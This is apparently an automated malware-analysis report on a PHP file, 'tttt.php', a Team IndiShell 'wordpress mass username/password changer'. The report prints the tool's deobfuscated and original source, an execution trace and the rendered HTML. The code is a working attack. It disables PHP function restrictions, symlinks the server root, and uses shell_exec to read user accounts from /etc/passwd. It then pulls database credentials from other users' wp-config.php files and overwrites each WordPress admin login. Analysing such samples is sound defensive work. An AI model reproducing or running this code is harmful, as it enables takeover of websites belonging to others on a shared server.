PHP Malware Analysis
tttt.php
md5: aab8060e14a99064f125b557571d4d6b
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, Original, Traces)
Execution
- shell_exec (Deobfuscated, Original)
Files
- file_get_contents (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- --==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==-- (HTML, Original, Traces)
URLs
- http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif (Deobfuscated, HTML, Original)
- https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg (Deobfuscated, HTML, Original, Traces)
Deobfuscated PHP code
<?php
$head = '
<html>
<head>
</script>
<title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
background-image: url("https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg");
background-position: center center;
background-repeat: no-repeat;
background-size: 400px 650px;
background-color: #000000;
background-attachment: fixed;
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : dashed 1px;
border-color : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
?>
<html>
<head>
<?php
echo "\r\n<html>\r\n<head>\r\n</script>\r\n<title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\r\n\r\n<STYLE>\r\nbody {\r\nbackground-image: url(\"https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg\");\r\nbackground-position: center center;\r\nbackground-repeat: no-repeat;\r\nbackground-size: 400px 650px;\r\nbackground-color: #000000;\r\nbackground-attachment: fixed;\r\nfont-family: Tahoma\r\n}\r\ntr {\r\nBORDER: dashed 1px #333;\r\ncolor: #FFF;\r\n}\r\ntd {\r\nBORDER: dashed 1px #333;\r\ncolor: #FFF;\r\n}\r\n.table1 {\r\nBORDER: 0px Black;\r\nBACKGROUND-COLOR: Black;\r\ncolor: #FFF;\r\n}\r\n.td1 {\r\nBORDER: 0px;\r\nBORDER-COLOR: #333333;\r\nfont: 7pt Verdana;\r\ncolor: Green;\r\n}\r\n.tr1 {\r\nBORDER: 0px;\r\nBORDER-COLOR: #333333;\r\ncolor: #FFF;\r\n}\r\ntable {\r\nBORDER: dashed 1px #333;\r\nBORDER-COLOR: #333333;\r\nBACKGROUND-COLOR: Black;\r\ncolor: #FFF;\r\n}\r\ninput {\r\nborder\t\t\t: dashed 1px;\r\nborder-color\t\t: #333;\r\nBACKGROUND-COLOR: Black;\r\nfont: 8pt Verdana;\r\ncolor: Red;\r\n}\r\nselect {\r\nBORDER-RIGHT: Black 1px solid;\r\nBORDER-TOP: #DF0000 1px solid;\r\nBORDER-LEFT: #DF0000 1px solid;\r\nBORDER-BOTTOM: Black 1px solid;\r\nBORDER-color: #FFF;\r\nBACKGROUND-COLOR: Black;\r\nfont: 8pt Verdana;\r\ncolor: Red;\r\n}\r\nsubmit {\r\nBORDER: buttonhighlight 2px outset;\r\nBACKGROUND-COLOR: Black;\r\nwidth: 30%;\r\ncolor: #FFF;\r\n}\r\ntextarea {\r\nborder\t\t\t: dashed 1px #333;\r\nBACKGROUND-COLOR: Black;\r\nfont: Fixedsys bold;\r\ncolor: #999;\r\n}\r\nBODY {\r\n\tSCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF\r\nmargin: 1px;\r\ncolor: Red;\r\nbackground-color: Black;\r\n}\r\n.main {\r\nmargin\t\t\t: -287px 0px 0px -490px;\r\nBORDER: dashed 1px #333;\r\nBORDER-COLOR: #333333;\r\n}\r\n.tt {\r\nbackground-color: Black;\r\n}\r\n\r\nA:link {\r\n\tCOLOR: White; TEXT-DECORATION: none\r\n}\r\nA:visited {\r\n\tCOLOR: White; TEXT-DECORATION: none\r\n}\r\nA:hover {\r\n\tcolor: Red; TEXT-DECORATION: none\r\n}\r\nA:active {\r\n\tcolor: Red; TEXT-DECORATION: none\r\n}\r\n</STYLE>\r\n<script language='javascript'>\r\nfunction hide_div(id)\r\n{\r\n document.getElementById(id).style.display = 'none';\r\n document.cookie=id+'=0;';\r\n}\r\nfunction show_div(id)\r\n{\r\n document.getElementById(id).style.display = 'block';\r\n document.cookie=id+'=1;';\r\n}\r\nfunction change_divst(id)\r\n{\r\n if (document.getElementById(id).style.display == 'none')\r\n show_div(id);\r\n else\r\n hide_div(id);\r\n}\r\n</script>";
echo "\r\n<div align=center><font color=white font size=4><marquee behavior=\"scroll\" direction=\"left\" scrollamount=\"2\" scrolldelay=\"3\" width=\"50%\"><span class=\"footerlink\">Special f**k goes to my best buddy \"Suriya CyberTyson\" <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif></span></marquee><br></font></div>\r\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" class=\"tb1\" >\r\n\r\n\t\t\t\r\n\r\n <td width=\"100%\" align=center valign=\"top\" rowspan=\"1\">\r\n <font color=#ff9933 size=5 face=\"comic sans ms\"><b>--==[[ Code Breaker ICA ]]==--</font><font color=white size=5 face=\"comic sans ms\"><b><br> <font color=#ff9933 size=5 face=\"comic sans ms\">--==[[ <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> w0rdpress mass </font><font color=white size=5 face=\"comic sans ms\">admin panel username/pasword </font><font color=green size=5 face=\"comic sans ms\"><b>changer By Team IndiShell <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> ]]==--</font> <div class=\"hedr\"> \r\n\r\n <td height=\"10\" align=\"left\" class=\"td1\"></td></tr><tr><td \r\n width=\"100%\" align=\"center\" valign=\"top\" rowspan=\"1\"><font \r\n color=\"red\" face=\"comic sans ms\"size=\"1\"><b> \r\n <font color=#ff9933> \r\n ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br> Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Striker india,cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>\r\n\r\n<font color=white>--==[[Dedicated to]]==--</font>\r\n<br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>Deepika Kaushik</font><br><font color=#ff9933> \r\n ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>\r\n\t\t\t\t\t\t\r\n </table>\r\n \r\n</table>\r\n";
?>
<body bgcolor=black><h3 style="text-align:center">
<form method=post><font color=white size=3 face="comic sans ms">Bhai ji ,Run php.ini first of all :) <br>The button given below generates php.ini file :)</font><br>
<input type=submit name=ini value="use to Generate PHP.ini" /></form>
<?php
if (isset($_POST['ini'])) {
$r = fopen('php.ini', 'w');
$rr = " disable_functions=none ";
fwrite($r, $rr);
$link = "<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
echo "<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
echo "<br>";
}
?>
<div align=center><table width=60%><tr><td align=center><a href="<?php
echo "?whole";
?>"><font color=white size=3 face="comic sans ms">change user/pass for whole server</font></a></td><td align=center><a href="<?php
echo "?particular";
?>"><font color=white size=3 face="comic sans ms">change user/pass for particualr users</a></font></td></tr></table><br>
<?php
if (isset($_GET['whole'])) {
echo "<font color=white size=3 face=\"comic sans ms\">bhai ji , please fill the username/password that you want to set on admin panels :)<br><form method=post><font color=white size=3 face=\"comic sans ms\">";
echo "username:<input type=text name=uname value=Team><br>";
echo "Password<input type=text name=pass value=INDISHELL></font><br>";
echo "<input type=submit name=start value=\"start 8-)\"><p>";
}
error_reporting(0);
function entre2v2($text, $marqueurDebutLien, $marqueurFinLien)
{
$ar0 = explode($marqueurDebutLien, $text);
$ar1 = explode($marqueurFinLien, $ar0[1]);
$ar = trim($ar1[0]);
return $ar;
}
if (isset($_POST['start'])) {
$uname = $_POST['uname'];
$pass = $_POST['pass'];
////////////////////////////////////////////////////////
/////////////////// symlink ///////////////////
////////////////////////////////////////////////////////
mkdir('Indishell', 0777);
$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('Indishell/.htaccess', 'w');
fwrite($g, $rr);
symlink("/", "Indishell/root");
if (!is_dir('Indishell/root')) {
echo "sorry bhai ji , script could not symlink / folder :( ";
} else {
$cmd = "awk -F : '(\$3>500) && (\$3!=65534) && (\$3!=1000)' /etc/passwd | cut -f 1 -d ':' ";
$c = shell_exec($cmd);
$usr = explode("\n", $c);
foreach ($usr as $us) {
$u = trim($us);
$base_url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/Indishell/root/home/';
$confi = array("wp-config.php", "blog/wp-config.php", "wordpress/wp-login.php");
foreach ($confi as $co) {
$uurl = @file_get_contents($base_url . $u . "/public_html/" . $co);
if ($uurl && preg_match('/DB_NAME/i', $uurl)) {
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is wordpress of user {$u} </font></td></tr></table>";
$wl = $base_url . $u . "/public_html/" . $co;
$text = file_get_contents($wl);
$uname = $_POST['uname'];
$dbu = entre2v2($text, "define('DB_USER', '", "');");
$dbp = entre2v2($text, "define('DB_PASSWORD', '", "');");
$dbn = entre2v2($text, "define('DB_NAME', '", "');");
$tp = entre2v2($text, "{$table_prefix} = '", "'");
$npwd = md5($pass);
$host = "localhost";
$dbconnect = @mysql_connect($host, $dbu, $dbp);
$dbselect = @mysql_select_db($dbn, $dbconnect);
if ($dbselect) {
echo "<font color=red>database {$dbn} has been selected<br>";
$ru = @mysql_query("UPDATE `" . $tp . "users` SET `user_login` ='" . $uname . "' WHERE ID = 1");
$ru = @mysql_query("UPDATE `" . $tp . "users` SET `user_pass` ='" . $npwd . "' WHERE ID = 1");
$req = mysql_query("SELECT * from `" . $tp . "options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url = $data["option_value"];
echo "website is " . $data["option_value"];
if (!$ru) {
echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
} else {
echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username {$uname} and password {$pass} has been updated for ID=1 :D</font></td></tr></table><br>";
}
}
}
}
}
}
}
?>
<?php
if (isset($_GET['particular'])) {
?>
<font size=3 color=white face="comic sans ms">Put the wordpress website usernames for mass user/password change<br></font>
<form method=post>
<font size=3 color=white face="comic sans ms"> username:<input type=text name=uname value=Team><br>
Password<input type=text name=pass value=INDISHELL></font><br>
<font color=red size=3 face="comic sans ms">user list<br><textarea rows=6 cols=45 name=wen></textarea>
<br><br><input type=submit name=cant value="bhaiyu.... click me and i will try to hex this shit XD" /></form><p>
<?php
}
if (isset($_POST['cant'])) {
error_reporting(0);
$uname = $_POST['uname'];
$pass = $_POST['pass'];
$users = $_POST['wen'];
mkdir('Indishell', 0777);
$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('Indishell/.htaccess', 'w');
fwrite($g, $rr);
symlink("/", "Indishell/root");
$use = explode("\n", $users);
foreach ($use as $us) {
$u = trim($us);
echo "<font color=red size=3 face=\"comic sans ms\">" . $u;
$base_url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/Indishell/root/home/';
$confi = array("wp-config.php", "blog/wp-config.php", "wordpress/wp-login.php");
foreach ($confi as $co) {
$uurl = @file_get_contents($base_url . $u . "/public_html/" . $co);
if ($uurl && preg_match('/DB_NAME/i', $uurl)) {
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is wordpress of user {$u} </font></td></tr></table>";
$wl = $base_url . $u . "/public_html/" . $co;
$text = file_get_contents($wl);
$uname = $_POST['uname'];
$dbu = entre2v2($text, "define('DB_USER', '", "');");
$dbp = entre2v2($text, "define('DB_PASSWORD', '", "');");
$dbn = entre2v2($text, "define('DB_NAME', '", "');");
$tp = entre2v2($text, "{$table_prefix} = '", "'");
$npwd = md5($pass);
$host = "localhost";
$dbconnect = @mysql_connect($host, $dbu, $dbp);
$dbselect = @mysql_select_db($dbn, $dbconnect);
if ($dbselect) {
echo "<font color=red>database {$dbn} has been selected<br>";
$ru = @mysql_query("UPDATE `" . $tp . "users` SET `user_login` ='" . $uname . "' WHERE ID = 1");
$ru = @mysql_query("UPDATE `" . $tp . "users` SET `user_pass` ='" . $npwd . "' WHERE ID = 1");
$req = mysql_query("SELECT * from `" . $tp . "options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url = $data["option_value"];
echo "website is " . $data["option_value"];
if (!$ru) {
echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
} else {
echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username {$uname} and password {$pass} has been updated for ID=1 :D</font></td></tr></table><br>";
}
}
}
}
}
}
?> Execution traces
data/traces/aab8060e14a99064f125b557571d4d6b_trace-1676247983.3414.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:26:49.239179]
1 0 1 0.000145 393512
1 3 0 0.000422 439368 {main} 1 /var/www/html/uploads/tttt.php 0 0
1 A /var/www/html/uploads/tttt.php 6 $head = '\r\n<html>\r\n<head>\r\n</script>\r\n<title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>\r\n<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">\r\n\r\n<STYLE>\r\nbody {\r\nbackground-image: url("https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg");\r\nbackground-position: center center;\r\nbackground-repeat: no-repeat;\r\nbackground-size: 400px 650px;\r\nbackground-color: #000000;\r\nbackground-att'
2 4 0 0.000486 439480 error_reporting 0 /var/www/html/uploads/tttt.php 189 1 0
2 4 1 0.000502 439520
2 4 R 22527
1 3 1 0.000518 439480
0.000544 319192
TRACE END [2023-02-12 22:26:49.239609]
Generated HTML code
<html><head>
<title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>
body {
background-image: url("https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg");
background-position: center center;
background-repeat: no-repeat;
background-size: 400px 650px;
background-color: #000000;
background-attachment: fixed;
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : dashed 1px;
border-color : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
</style>
<script language="javascript">
function hide_div(id)
{
document.getElementById(id).style.display = 'none';
document.cookie=id+'=0;';
}
function show_div(id)
{
document.getElementById(id).style.display = 'block';
document.cookie=id+'=1;';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == 'none')
show_div(id);
else
hide_div(id);
}
</script>
</head><body bgcolor="black"><div align="center"><font color="white" font="" size="4"><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="3" width="50%"><span class="footerlink">Special f**k goes to my best buddy "Suriya CyberTyson" <img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif"></span></marquee><br></font></div>
<table width="100%" cellspacing="0" cellpadding="0" class="tb1">
<tbody><tr><td width="100%" align="center" valign="top" rowspan="1">
<font color="#ff9933" size="5" face="comic sans ms"><b>--==[[ Code Breaker ICA ]]==--</b></font><b><font color="white" size="5" face="comic sans ms"><b><br> <font color="#ff9933" size="5" face="comic sans ms">--==[[ <img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif"> w0rdpress mass </font><font color="white" size="5" face="comic sans ms">admin panel username/pasword </font><font color="green" size="5" face="comic sans ms"><b>changer By Team IndiShell <img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif"> ]]==--</b></font><b> <div class="hedr">
</div></b></b></font></b></td><td height="10" align="left" class="td1"></td></tr><tr><td width="100%" align="center" valign="top" rowspan="1"><font color="red" face="comic sans ms" size="1"><b>
<font color="#ff9933">
####################################################</font><font color="white">#####################################################</font><font color="green">####################################################</font><br><font color="white">-==[[Greetz to]]==--</font><br> Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Striker india,cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>
<font color="white">--==[[Dedicated to]]==--</font>
<br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #<br><font color="white">--==[[Interface Desgined By]]==--</font><br><font color="red">Deepika Kaushik</font><br><font color="#ff9933">
####################################################</font><font color="white">#####################################################</font><font color="green">####################################################</font>
</b></font></td></tr></tbody></table>
<h3 style="text-align:center">
<form method="post"><font color="white" size="3" face="comic sans ms">Bhai ji ,Run php.ini first of all :) <br>The button given below generates php.ini file :)</font><br>
<input type="submit" name="ini" value="use to Generate PHP.ini"></form>
<div align="center"><table width="60%"><tbody><tr><td align="center"><a href="?whole"><font color="white" size="3" face="comic sans ms">change user/pass for whole server</font></a></td><td align="center"><a href="?particular"><font color="white" size="3" face="comic sans ms">change user/pass for particualr users</font></a></td></tr></tbody></table><br>
</div></h3></body></html>Original PHP code
<?php
$head = '
<html>
<head>
</script>
<title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
background-image: url("https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg");
background-position: center center;
background-repeat: no-repeat;
background-size: 400px 650px;
background-color: #000000;
background-attachment: fixed;
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : dashed 1px;
border-color : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>'; ?>
<html>
<head>
<?php
echo $head ;
echo '
<div align=center><font color=white font size=4><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="3" width="50%"><span class="footerlink">Special f**k goes to my best buddy "Suriya CyberTyson" <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif></span></marquee><br></font></div>
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Code Breaker ICA ]]==--</font><font color=white size=5 face="comic sans ms"><b><br> <font color=#ff9933 size=5 face="comic sans ms">--==[[ <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> w0rdpress mass </font><font color=white size=5 face="comic sans ms">admin panel username/pasword </font><font color=green size=5 face="comic sans ms"><b>changer By Team IndiShell <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> ]]==--</font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br> Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Striker india,cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>
<font color=white>--==[[Dedicated to]]==--</font>
<br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>Deepika Kaushik</font><br><font color=#ff9933>
####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
</table>
</table>
';
?>
<body bgcolor=black><h3 style="text-align:center">
<form method=post><font color=white size=3 face="comic sans ms">Bhai ji ,Run php.ini first of all :) <br>The button given below generates php.ini file :)</font><br>
<input type=submit name=ini value="use to Generate PHP.ini" /></form>
<?php
if(isset($_POST['ini']))
{
$r=fopen('php.ini','w');
$rr=" disable_functions=none ";
fwrite($r,$rr);
$link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
echo $link;
echo "<br>";
}
?>
<div align=center><table width=60%><tr><td align=center><a href="<?php echo '?whole'; ?>"><font color=white size=3 face="comic sans ms">change user/pass for whole server</font></a></td><td align=center><a href="<?php echo '?particular'?>"><font color=white size=3 face="comic sans ms">change user/pass for particualr users</a></font></td></tr></table><br>
<?php
if(isset($_GET['whole']))
{
echo "<font color=white size=3 face=\"comic sans ms\">bhai ji , please fill the username/password that you want to set on admin panels :)<br><form method=post><font color=white size=3 face=\"comic sans ms\">";
echo "username:<input type=text name=uname value=Team><br>";
echo "Password<input type=text name=pass value=INDISHELL></font><br>";
echo "<input type=submit name=start value=\"start 8-)\"><p>";
}
?>
<?php
error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=trim($ar1[0]);
return $ar;
}
if(isset($_POST['start']))
{
$uname=$_POST['uname'];
$pass=$_POST['pass'];
////////////////////////////////////////////////////////
/////////////////// symlink ///////////////////
////////////////////////////////////////////////////////
mkdir('Indishell',0777);
